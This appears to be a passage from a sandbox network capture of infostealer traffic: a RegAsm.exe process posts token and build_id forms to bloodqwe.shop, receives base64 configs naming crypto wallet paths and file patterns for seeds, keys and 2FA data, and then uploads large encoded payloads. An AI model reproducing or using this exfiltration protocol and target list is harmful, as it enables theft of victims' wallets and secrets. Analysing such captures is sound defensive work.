2024-09-28 03:23:35 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 37 37 66 61 63 36 38 66 30 64 63 64 31 63 32 35 62 34 36 66 36 65 33 39 30 36 39 37 35 39 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 30 37 36 62 36 61 30 32 65 62 30 32 38 64 64 65 34 36 31 66 36 34 39 34 66 39 35 35 62 34 39 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 Data Ascii: ------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="token"977fac68f0dcd1c25b46f6e39069759a------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="build_id"0076b6a02eb028dde461f6494f955b49------HCAAEBKEGHJKEBFHJDBFCont
2024-09-28 03:23:36 UTC	548	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:23:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o%2F5RXb0LhF9q0VqvRtSw9NU9g%2BTM3zu4S0GrkNFY7vUNPw%2BHkq6utm%2FXe3kleFDY5qWMnVji76wEH%2FbcM9VFd25sgVjhBQGxZL%2BnKt%2BZYSBzm9PF98uH%2FDDiRkV4Yu0m"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09d9d6df37cea-EWR
2024-09-28 03:23:36 UTC	821	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG
2024-09-28 03:23:36 UTC	1369	IN	Data Raw: 66 45 56 34 62 32 52 31 63 33 77 78 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 61 57 35 6d 62 79 35 7a 5a 57 4e 76 66 44 42 38 52 58 68 76 5a 48 56 7a 66 44 46 38 58 45 56 34 62 32 52 31 63 31 78 69 59 57 4e 72 64 58 42 7a 58 48 77 71 4c 69 70 38 4d 58 78 46 62 47 56 6a 64 48 4a 76 62 69 42 44 59 58 4e 6f 66 44 46 38 58 45 56 73 5a 57 4e 30 63 6d 39 75 51 32 46 7a 61 46 78 33 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 69 70 38 4d 48 78 4e 64 57 78 30 61 55 52 76 5a 32 56 38 4d 58 78 63 54 58 56 73 64 47 6c 45 62 32 64 6c 58 48 78 74 64 57 78 30 61 57 52 76 5a 32 55 75 64 32 46 73 62 47 56 30 66 44 42 38 51 58 52 76 62 57 6c 6a 66 44 46 38 58 47 46 30 62 32 31 70 59 31 78 4d 62 32 4e 68 62 43 42 54 64 47 39 Data Ascii: fEV4b2R1c3wxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RXhvZHVzfDF8XEV4b2R1c1xiYWNrdXBzXHwqLip8MXxFbGVjdHJvbiBDYXNofDF8XEVsZWN0cm9uQ2FzaFx3YWxsZXRzXHwqLip8MHxNdWx0aURvZ2V8MXxcTXVsdGlEb2dlXHxtdWx0aWRvZ2Uud2FsbGV0fDB8QXRvbWljfDF8XGF0b21pY1xMb2NhbCBTdG9
2024-09-28 03:23:36 UTC	33	IN	Data Raw: 47 39 79 59 57 64 6c 58 47 78 6c 64 6d 56 73 5a 47 4a 63 66 43 6f 75 4b 6e 77 77 66 41 3d 3d 0d 0a Data Ascii: G9yYWdlXGxldmVsZGJcfCouKnwwfA==
2024-09-28 03:23:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49730	172.67.167.90	443	7152	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:23:36 UTC	180	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHCGHDHIDHCBGCBGCAEB Host: bloodqwe.shop Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-28 03:23:36 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 37 37 66 61 63 36 38 66 30 64 63 64 31 63 32 35 62 34 36 66 36 65 33 39 30 36 39 37 35 39 61 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 30 37 36 62 36 61 30 32 65 62 30 32 38 64 64 65 34 36 31 66 36 34 39 34 66 39 35 35 62 34 39 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 45 42 0d 0a 43 6f 6e 74 Data Ascii: ------DHCGHDHIDHCBGCBGCAEBContent-Disposition: form-data; name="token"977fac68f0dcd1c25b46f6e39069759a------DHCGHDHIDHCBGCBGCAEBContent-Disposition: form-data; name="build_id"0076b6a02eb028dde461f6494f955b49------DHCGHDHIDHCBGCBGCAEBCont
2024-09-28 03:23:37 UTC	540	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:23:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=23UFKK2gGLFcGL%2BzcSrc5fEIKZGkvtc%2Bw2CWLcVUciqATPT%2BuRGPKL6NwjuDAfd0sCzkmpIsZ9Ps5E4lXEsEaT3F16LXe51u8ZQ4%2BpObrFeFkx14Tzdz74L0zokwAlsH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09da42cab0cac-EWR
2024-09-28 03:23:37 UTC	829	IN	Data Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi
2024-09-28 03:23:37 UTC	690	IN	Data Raw: 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e 52 6a 4b 69 34 71 4c 43 70 69 61 58 52 6d 62 48 6c 6c 63 69 6f 75 4b 69 77 71 61 33 56 6a 62 32 6c 75 4b 69 34 71 4c 43 70 6f 64 57 39 69 61 53 6f 75 4b 69 77 71 63 47 39 73 62 32 35 70 5a 58 67 71 4c 69 6f Data Ascii: a2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0YnRjKi4qLCpiaXRmbHllciouKiwqa3Vjb2luKi4qLCpodW9iaSouKiwqcG9sb25pZXgqLio
2024-09-28 03:23:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49731	172.67.167.90	443	7152	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:23:38 UTC	180	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEGHDAFIDGDAAKEBFHDA Host: bloodqwe.shop Content-Length: 461 Connection: Keep-Alive Cache-Control: no-cache
2024-09-28 03:23:38 UTC	461	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 37 37 66 61 63 36 38 66 30 64 63 64 31 63 32 35 62 34 36 66 36 65 33 39 30 36 39 37 35 39 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 30 37 36 62 36 61 30 32 65 62 30 32 38 64 64 65 34 36 31 66 36 34 39 34 66 39 35 35 62 34 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 0d 0a 43 6f 6e 74 Data Ascii: ------JEGHDAFIDGDAAKEBFHDAContent-Disposition: form-data; name="token"977fac68f0dcd1c25b46f6e39069759a------JEGHDAFIDGDAAKEBFHDAContent-Disposition: form-data; name="build_id"0076b6a02eb028dde461f6494f955b49------JEGHDAFIDGDAAKEBFHDACont
2024-09-28 03:23:38 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:23:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ihIEMa2ZpTf6Dln21lcZMSD1dzNdUCZAmpknda4p5EGcctC6KiTAH4uxWsH8nqq%2FfLtkrIJPzNne7JX52GmMSC3opm85CJ%2FjAH8753BrizdDPoR1vW7%2FMCpeplLuKqF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09dab98b4426d-EWR
2024-09-28 03:23:38 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-09-28 03:23:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49732	172.67.167.90	443	7152	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:23:40 UTC	183	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKFBAAFCGIEGDHIEBFII Host: bloodqwe.shop Content-Length: 114353 Connection: Keep-Alive Cache-Control: no-cache
2024-09-28 03:23:40 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 42 41 41 46 43 47 49 45 47 44 48 49 45 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 37 37 66 61 63 36 38 66 30 64 63 64 31 63 32 35 62 34 36 66 36 65 33 39 30 36 39 37 35 39 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 42 41 41 46 43 47 49 45 47 44 48 49 45 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 30 37 36 62 36 61 30 32 65 62 30 32 38 64 64 65 34 36 31 66 36 34 39 34 66 39 35 35 62 34 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 42 41 41 46 43 47 49 45 47 44 48 49 45 42 46 49 49 0d 0a 43 6f 6e 74 Data Ascii: ------KKFBAAFCGIEGDHIEBFIIContent-Disposition: form-data; name="token"977fac68f0dcd1c25b46f6e39069759a------KKFBAAFCGIEGDHIEBFIIContent-Disposition: form-data; name="build_id"0076b6a02eb028dde461f6494f955b49------KKFBAAFCGIEGDHIEBFIICont
2024-09-28 03:23:40 UTC	16355	OUT	Data Raw: 48 55 73 50 6a 4f 66 32 6e 4b 37 6d 68 34 4f 38 51 54 58 4e 33 70 57 68 58 75 54 63 32 56 32 35 6a 62 72 6c 42 44 4b 43 43 66 59 6b 44 36 66 53 71 66 6a 66 38 41 35 47 32 37 2f 77 42 32 50 2f 30 42 61 31 50 43 2f 67 48 56 74 46 38 52 32 6d 6f 33 56 78 5a 76 46 44 76 33 43 4e 33 4c 63 6f 56 47 4d 71 50 55 64 36 79 2f 47 2f 38 41 79 4e 74 35 39 49 2f 2f 41 45 42 61 35 61 4c 70 53 78 79 64 4a 33 56 6e 39 2b 70 70 6a 46 56 6a 6c 7a 56 56 57 66 4d 76 75 30 4f 65 70 4b 57 69 76 61 50 6d 68 4b 4b 57 6b 70 67 54 66 44 32 2b 74 4c 66 57 72 71 79 31 43 34 6a 67 73 74 51 73 35 4c 65 52 35 48 43 71 4d 6a 4f 53 54 78 30 42 48 34 31 32 57 6c 65 49 74 49 76 2f 41 42 68 72 31 72 66 58 74 74 48 70 2f 6d 57 38 6c 71 37 7a 4b 73 65 59 47 47 4e 72 45 34 4f 53 41 66 63 5a 72 Data Ascii: HUsPjOf2nK7mh4O8QTXN3pWhXuTc2V25jbrlBDKCCfYkD6fSqfjf8A5G27/wB2P/0Ba1PC/gHVtF8R2mo3VxZvFDv3CN3LcoVGMqPUd6y/G/8AyNt59I//AEBa5aLpSxydJ3Vn9+ppjFVjlzVVWfMvu0OepKWivaPmhKKWkpgTfD2+tLfWrqy1C4jgstQs5LeR5HCqMjOSTx0BH412WleItIv/ABhr1rfXttHp/mW8lq7zKseYGGNrE4OSAfcZr
2024-09-28 03:23:40 UTC	16355	OUT	Data Raw: 31 37 50 54 52 36 2b 66 51 37 38 75 78 4e 43 6a 43 58 74 64 57 32 74 4f 6c 75 6f 37 54 74 51 6d 31 46 37 46 72 36 47 79 44 72 71 46 6d 41 59 4c 64 49 31 64 4a 5a 4e 72 52 73 46 41 44 63 63 6a 49 4a 34 50 61 73 72 54 74 53 75 4a 50 43 46 78 72 4c 57 69 4e 63 57 49 6c 6a 69 51 4b 6d 32 64 53 56 7a 49 77 50 4c 65 55 58 47 65 44 6e 63 6e 59 47 72 39 79 64 56 6e 69 68 69 5a 62 41 69 33 75 55 75 72 61 53 4b 32 57 41 77 53 72 30 63 4c 48 74 52 6a 77 42 38 36 74 37 59 71 72 62 61 52 64 51 43 31 66 37 57 6f 6b 74 59 57 67 68 41 68 54 59 45 59 48 63 43 75 4d 4e 6e 63 32 63 67 35 7a 7a 58 6e 79 77 6d 4c 6c 4a 38 75 69 36 61 2f 77 42 65 66 33 6e 71 77 78 32 41 68 42 63 2f 76 50 72 70 36 2f 38 41 41 2b 34 30 5a 70 59 37 69 44 53 52 62 6f 6b 42 6a 73 37 5a 64 51 6b 52 Data Ascii: 17PTR6+fQ78uxNCjCXtdW2tOluo7TtQm1F7Fr6GyDrqFmAYLdI1dJZNrRsFADccjIJ4PasrTtSuJPCFxrLWiNcWIljiQKm2dSVzIwPLeUXGeDncnYGr9ydVnihiZbAi3uUuraSK2WAwSr0cLHtRjwB86t7YqrbaRdQC1f7WoktYWghAhTYEYHcCuMNnc2cg5zzXnywmLlJ8ui6a/wBef3nqwx2AhBc/vPrp6/8AA+40ZpY7iDSRbokBjs7ZdQkR
2024-09-28 03:23:40 UTC	16355	OUT	Data Raw: 50 72 6d 76 54 76 44 4f 6c 2b 48 4e 4d 53 5a 39 53 76 49 4a 37 78 4c 73 53 51 7a 67 73 54 74 55 68 6c 49 34 34 79 63 35 46 63 62 34 72 30 73 36 72 34 70 31 47 2b 74 35 6c 4d 4d 30 75 35 44 6a 71 4d 43 76 6d 4a 34 4f 56 53 58 4c 52 68 74 2f 58 55 2b 74 78 46 62 44 30 71 66 4e 4e 72 56 2b 58 6e 32 4f 48 55 7a 4f 52 35 6d 33 41 4f 65 42 55 34 64 77 4d 42 6d 41 39 6a 57 7a 2f 77 41 49 33 50 38 41 38 39 52 2f 33 7a 2f 39 65 6a 2f 68 47 35 2f 2b 65 6f 2f 37 35 2f 38 41 72 30 76 37 4c 78 66 38 6e 34 72 2f 41 44 4f 48 36 2f 68 66 35 6a 47 38 78 2f 37 37 66 6e 57 39 34 61 5a 6d 65 35 33 45 6e 68 65 70 2b 74 52 66 38 49 33 50 2f 77 41 39 52 2f 33 7a 2f 77 44 58 72 54 30 6a 54 48 30 2f 7a 53 37 37 69 2b 4f 33 70 58 5a 6c 2b 41 78 46 4c 45 78 6e 4f 4e 6b 72 39 75 78 Data Ascii: PrmvTvDOl+HNMSZ9SvIJ7xLsSQzgsTtUhlI44yc5Fcb4r0s6r4p1G+t5lMM0u5DjqMCvmJ4OVSXLRht/XU+txFbD0qfNNrV+Xn2OHUzOR5m3AOeBU4dwMBmA9jWz/wAI3P8A89R/3z/9ej/hG5/+eo/75/8Ar0v7Lxf8n4r/ADOH6/hf5jG8x/77fnW94aZme53Enhep+tRf8I3P/wA9R/3z/wDXrT0jTH0/zS77i+O3pXZl+AxFLExnONkr9ux
2024-09-28 03:23:40 UTC	16355	OUT	Data Raw: 37 65 74 43 6c 37 4b 33 4d 30 76 69 37 75 33 59 36 73 56 77 72 37 43 6a 4f 72 37 57 2f 4b 6d 2f 68 37 4b 2f 63 38 2f 6f 6f 6f 72 36 34 2b 52 43 69 69 69 6d 41 55 79 61 56 49 49 57 6c 63 34 56 52 6b 30 2b 71 57 72 66 38 67 79 62 2f 41 49 44 2f 41 4f 68 43 75 66 46 31 58 52 77 38 36 73 64 34 70 76 37 6b 64 2b 56 59 57 47 4c 78 39 44 44 56 50 68 6e 4f 4d 58 36 4e 70 4d 31 62 58 51 2f 45 74 37 62 52 33 4e 76 6f 54 74 44 49 4e 79 46 37 69 4e 43 51 65 68 77 54 6d 70 76 2b 45 5a 38 56 66 39 41 48 2f 77 41 6e 49 76 38 41 47 76 58 67 41 42 67 44 41 48 51 56 54 31 54 55 34 64 4a 73 6a 64 54 4a 4c 49 4e 79 6f 73 63 53 35 64 32 4a 77 41 42 6b 56 38 6f 38 77 78 69 56 33 56 66 33 52 2f 38 41 6b 54 39 43 6a 6c 65 57 54 6c 79 77 77 6b 64 64 76 65 71 66 2f 4a 6e 6c 6a 65 Data Ascii: 7etCl7K3M0vi7u3Y6sVwr7CjOr7W/Km/h7K/c8/ooor64+RCiiimAUyaVIIWlc4VRk0+qWrf8gyb/AID/AOhCufF1XRw86sd4pv7kd+VYWGLx9DDVPhnOMX6NpM1bXQ/Et7bR3NvoTtDINyF7iNCQehwTmpv+EZ8Vf9AH/wAnIv8AGvXgABgDAHQVT1TU4dJsjdTJLINyoscS5d2JwABkV8o8wxiV3Vf3R/8AkT9CjleWTlywwkddveqf/Jnlje
2024-09-28 03:23:40 UTC	16355	OUT	Data Raw: 6f 70 67 4a 52 52 52 51 4d 51 55 55 63 30 55 41 46 4a 53 30 55 41 4a 52 52 52 51 4d 54 76 51 61 4b 53 67 59 55 6c 4c 53 55 44 43 6b 70 61 53 67 41 70 4b 57 6b 6f 47 46 42 6f 70 4b 42 68 52 52 53 47 67 41 6f 4a 6f 70 4b 59 77 6f 6f 70 4b 42 68 53 55 74 4e 4a 6f 42 42 52 52 53 47 67 59 74 4a 6d 69 6b 2b 74 4d 59 5a 6f 70 43 77 70 75 36 6d 4f 77 70 6f 4a 41 70 68 50 72 53 66 6a 52 63 71 77 34 74 54 53 53 61 4b 53 6c 63 64 67 70 4b 4b 4b 43 68 4b 51 30 66 68 52 53 47 46 4a 6e 6d 6c 70 70 6f 41 58 76 53 55 55 47 6d 55 4a 53 55 47 69 67 59 5a 70 70 70 31 4e 4e 49 61 45 6f 6f 4e 48 61 67 61 45 7a 52 51 61 53 6d 4d 53 69 67 30 55 44 45 70 4b 44 52 53 47 68 44 30 6f 6f 70 4b 59 77 6f 6f 70 42 51 4d 50 35 55 68 7a 53 6d 6b 4a 35 6f 47 48 46 4a 31 70 66 70 53 64 66 Data Ascii: opgJRRRQMQUUc0UAFJS0UAJRRRQMTvQaKSgYUlLSUDCkpaSgApKWkoGFBopKBhRRSGgAoJopKYwoopKBhSUtNJoBBRRSGgYtJmik+tMYZopCwpu6mOwpoJAphPrSfjRcqw4tTSSaKSlcdgpKKKChKQ0fhRSGFJnmlppoAXvSUUGmUJSUGigYZppp1NNIaEooNHagaEzRQaSmMSig0UDEpKDRSGhD0oopKYwoopBQMP5UhzSmkJ5oGHFJ1pfpSdf
2024-09-28 03:23:40 UTC	16223	OUT	Data Raw: 77 44 31 55 44 43 6b 6f 39 36 44 31 6f 47 48 61 6b 36 30 47 6a 76 31 6f 41 50 38 39 61 54 50 2b 54 51 61 4b 43 68 4b 44 2b 56 48 61 67 64 71 41 44 50 58 4e 49 54 39 54 52 6e 6d 6a 4e 41 78 4d 59 37 30 55 76 36 2b 2b 4b 51 55 44 45 37 30 47 67 47 69 67 41 50 57 6b 7a 51 4f 74 42 36 55 44 50 51 36 57 6d 6c 67 46 5a 69 47 32 71 51 47 62 61 63 41 6e 6f 43 65 32 63 48 38 71 63 56 6b 57 7a 6b 76 50 4a 6d 4e 72 47 64 72 7a 69 4a 69 69 6e 6a 67 74 6a 41 36 6a 38 36 79 63 34 72 64 6e 79 71 70 7a 6c 73 6d 53 32 39 7a 4e 61 54 72 4e 42 49 55 6b 55 38 4d 4b 36 79 50 78 67 6a 61 61 37 76 43 68 75 30 78 2b 37 62 4f 31 2b 52 6b 67 39 6a 33 72 6b 70 37 65 35 74 54 45 4c 6d 30 75 6f 54 4d 77 53 49 53 77 4f 76 6d 4d 65 67 58 49 35 50 73 4b 72 65 66 47 55 57 54 4a 43 4f 43 Data Ascii: wD1UDCko96D1oGHak60Gjv1oAP89aTP+TQaKChKD+VHagdqADPXNIT9TRnmjNAxMY70Uv6++KQUDE70GgGigAPWkzQOtB6UDPQ6WmlgFZiG2qQGbacAnoCe2cH8qcVkWzkvPJmNrGdrziJiinjgtjA6j86yc4rdnyqpzlsmS29zNaTrNBIUkU8MK6yPxgjaa7vChu0x+7bO1+Rkg9j3rkp7e5tTELm0uoTMwSISwOvmMegXI5PsKrefGUWTJCOC
2024-09-28 03:23:41 UTC	540	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:23:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VXjeyXh0lrad7f6e07Nb8fOq%2BuUocpPtsp0M2zy%2FVEUvqM2x4ebyw%2BmBnZviOPgZ55rk3waB5oljEatF%2FpQOeZCEzxTfeBdAuOkMEm0D6cphvbKeMxChhvWflMbcN287"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09db96c8c5e7f-EWR
2024-09-28 03:23:41 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-09-28 03:23:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49734	172.67.167.90	443	7152	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:23:42 UTC	180	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKJKKJJKJEGIECAKJJEB Host: bloodqwe.shop Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
